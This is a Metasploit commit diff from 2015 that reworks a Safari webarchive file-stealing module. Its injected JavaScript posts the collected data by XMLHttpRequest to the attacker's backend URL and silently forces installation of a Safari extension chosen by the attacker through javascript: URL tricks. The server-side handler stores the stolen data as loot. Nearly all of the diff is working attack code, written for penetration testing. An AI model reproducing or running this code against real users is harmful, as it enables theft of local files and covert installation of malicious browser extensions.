Fix some bugs in the safari file navigation module.

joevennix · joevennix · commit b577f798458f · 2015-07-05T16:46:18.000-05:00
diff --git a/lib/msf/core/format/webarchive.rb b/lib/msf/core/format/webarchive.rb
@@ -91,24 +91,8 @@ def wrap_with_script(&blk)
   # @return [String] mark up for embedding the iframes for each URL in a place that is
   #   invisible to the user
   def iframes_container_html
-    hidden_style = "position:fixed; left:-600px; top:-600px;"
     wrap_with_doc do
-      communication_js + injected_js_helpers + steal_files + install_extension + message
-    end
-  end
-
-  # @return [String] javascript code, wrapped in script tags, that is inserted into the
-  #   WebMainResource (parent) frame so that child frames can communicate "up" to the parent
-  #   and send data out to the listener
-  def communication_js
-    wrap_with_script do
-      %Q|
-        window.addEventListener('message', function(event){
-          var x = new XMLHttpRequest;
-          x.open('POST', '#{backend_url}#{collect_data_uri}', true);
-          x.send(event.data);
-        });
-      |
+      injected_js_helpers + steal_files + install_extension + message
     end
   end
 
@@ -122,23 +106,20 @@ def install_extension
     raise "EXTENSION_ID datastore option missing" unless datastore['EXTENSION_ID'].present?
     wrap_with_script do
       %Q|
+      var qq = null;
       var extURL = atob('#{Rex::Text.encode_base64(datastore['EXTENSION_URL'])}');
       var extID = atob('#{Rex::Text.encode_base64(datastore['EXTENSION_ID'])}');
 
       function go(){
         window.focus();
-        window.open('javascript:safari&&(safari.installExtension\|\|(window.top.location.href.match(/extensions/)&&window.top.location.reload(false)))&&(safari.installExtension("'+extID+'", "'+extURL+'"), window.close());', 'x')
-      }
-      if (!window.x){
-        alert(1);
-        window.onclick = function(){
-          x = window.open('#{apple_extension_url}', 'x');
-          setInterval(go, 400);
-        };
-      } else {
-        setInterval(go, 400);
+        qq.open('javascript:safari&&(safari.installExtension\|\|(window.top.location.href.match(/extensions/)&&window.top.location.reload(false)))&&(safari.installExtension("'+extID+'", "'+extURL+'"), window.close());', '_self');
       }
-
+      window.addEventListener('message', function(e) {
+        if (!qq && e.data === 'EXT') {
+          qq = e.source;
+          setInterval(go, 3000);
+        }
+      });
       |
     end
   end
@@ -327,7 +308,11 @@ def injected_js_helpers
         window.sendData = function(key, val) {
           var data = {};
           data[key] = val;
-          window.top.postMessage(JSON.stringify(data), "*")
+
+          var x = new XMLHttpRequest;
+          x.open('POST', '#{backend_url}#{collect_data_uri}', true);
+          x.setRequestHeader('Content-type', 'text/plain')
+          x.send(JSON.stringify(data));
         };
       |
     end
@@ -355,7 +340,7 @@ def webarchive_download_url
 
   # @return [String] HTML content that is rendered in the <body> of the webarchive.
   def message
-    "<p>You are being redirected. <a href='#'>Click here if nothing happens</a>.</p>"
+    "<p>You are being redirected.</p>"
   end
 
   # @return [Array<String>] of URLs provided by the user
diff --git a/modules/auxiliary/gather/safari_file_url_navigation.rb b/modules/auxiliary/gather/safari_file_url_navigation.rb
@@ -63,12 +63,12 @@ def on_request_uri(cli, req)
       begin
         data = JSON::parse(data_str || '')
         file = record_data(data, cli)
-        send_response_html(cli, '')
+        send_response(cli, '')
         print_good "data #{data.keys.join(',')} received and stored to #{file}"
       rescue JSON::ParserError => e # json error, dismiss request & keep crit. server up
         file = record_data(data_str, cli)
         print_error "Invalid JSON stored in #{file}"
-        send_response_html(cli, '')
+        send_response(cli, '')
       end
     elsif req.uri =~ /#{popup_path}$/
       send_response(cli, 200, 'OK', popup_html)
@@ -131,8 +131,7 @@ def popup_html
         },
         function() { opener.location = 'about:blank'; },
         function() { opener.history.back(); },
-        function() { },
-        function() { window.location = '#{apple_extension_url}'; }
+        function() { if (#{datastore['INSTALL_EXTENSION']}) { opener.postMessage('EXT', '*'); window.location = '#{apple_extension_url}'; } else { window.close(); } }
       )
 
      </script>
@@ -317,7 +316,8 @@ def send_response(cli, code, message='OK', html='')
   # @param [Hash] data the data to store in the log
   # @return [String] filename where we are storing the data
   def record_data(data, cli)
-    file = File.basename(data.keys.first).gsub(/[^A-Za-z]/,'')
+    name = if data.is_a?(Hash) then data.keys.first else 'data' end
+    file = File.basename(name).gsub(/[^A-Za-z]/,'')
     store_loot(
       file, "text/plain", cli.peerhost, data, "safari_webarchive", "Webarchive Collected Data"
     )
